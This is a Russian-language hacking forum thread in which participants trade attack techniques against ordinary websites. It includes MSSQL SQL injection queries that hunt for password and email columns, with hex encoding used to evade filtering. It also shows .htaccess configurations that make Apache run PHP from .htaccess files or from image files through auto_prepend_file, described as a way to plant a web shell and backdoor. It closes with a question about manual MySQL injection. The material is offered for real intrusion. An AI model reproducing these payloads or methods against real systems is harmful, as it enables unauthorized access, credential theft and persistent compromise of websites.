Также как и в Мусукле, но нужно учитывать кодировки текста, которого ищешь, и текста, в котором ищешь. Они должны строго совпадать.
все правильно с кодировками пробовал в char email кодировать char(101)%2Bchar(109)%2Bchar(97)%2Bchar(105)%2Bchar(108) тоже без результата select top 1 table_name from information_schema.tables where table_name like '%email%' такой запрос в sql inj не будет работать! а вот так SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ говорит Only one expression can be specified in the select list when the subquery is not introduced with EXISTS. пробовал на разных инъекциях везде одно и тоже, как-то по другому видимо нужно проблема не в кодировке и такие колонки есть в базе юзера мсскл
Попробуй прохексить поисковое значение в like: select top 1 table_name from information_schema.tables where table_name like 0x25656D61696C25 P.S: email скорее всего в вашем случае должен быть в column_name а не в table_name
А ничего больше заливать нельзя? Может проще в htaccess указать, чтобы пхп парсер проверял дополнительные файлы с нестандартным раширением (допустим картинок, которые очень часто в админках можно загружать).
он не заливается, а посто редактируется, я хотел прописать строчки чтобы он картинки как php обрабатывал, но мне мешает htaccess который лежит в каталоге с картинками
А можно попробовать создать еще одну папку и в нее свой .htaccess нужного содержания залить? или не вариант?
Да, разрешаешь в нем чтение .htaccess всем (или только себе), указываешь выполнять .htaccess как php скрипт, и тут же пишешь код. Сначала поэкспериментируй на локалхост. Код приводить не буду.
Проще залить шелл в формате изображения и потом через вышеуказанный .htaccess посредством директивы append(prepend) выполнить. К тому-же, выполнить в теле htaccess явно - <?php ?> не получится, синтаксис htaccess жестко формален и при помещении php кода внуть вызывает 500 ошибку
такс, поексперементировал, PHP: <Files .htaccess> Allow from 100.247.115.100 </Files> AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess # <? echo "aaaa"; ?> файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог PHP: <Files .htaccess> Allow from 100.247.115.100 </Files> php_value auto_prepend_file /home/domains/h.ru/public_html/phps.jpg а как мне его заставить выполнить код который в картинке?
php_value или php_admin_value auto_prepend_file или auto_append_file Путь к картинке содержащей обрамленный php-тегами код: /home/domains/h.ru/public_html/phps.jpg Если в самом конфиге апача вышеуказанные директивы уже описаны, то переопределяться в .htaccess файлах не будут. P.S. Как итересная альтернатива коду в картинке можно попробовать приатачить лог перебором пути - /proc/self/fd/2 etc...
Молодец, оба варианта правильные. Если на сервере команды не выполняются, значит нарушены условия http://php.net/manual/ru/configuration.changes.php Т.е. нужно, чтобы php запускался, как модуль Апача и разрешены AllowOverride All или AllowOverride Options.
<Files .htaccess> Allow from 100.247.115.100 </Files> AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess # <? echo "aaaa"; ?> Этот вариант неправильный. Вот тут - # <? echo "aaaa"; ?> решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла
Правильный, ты не понял фишку этого комментария Пробуй PHP: <FilesMatch "^\."> allow from all </FilesMatch> AddType application/x-httpd-php .htaccess #<?php phpinfo(); ?>
Где-то есть зависимость от базовых правил httpd.conf, так как на одном сервере заработало а на другом нет. P.S. натолкнуло на интересную мысль: Добавив DirectoryIndex .htaccess можно через теже non-GPC принимать данные на выполнение команд или кода в ракурсе бэкдора на сайте. P.S. Причем если php engine OFF или noexec то будет отдано как plain. Тогда вариант - shtml если настроено на сервере(предположение)
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
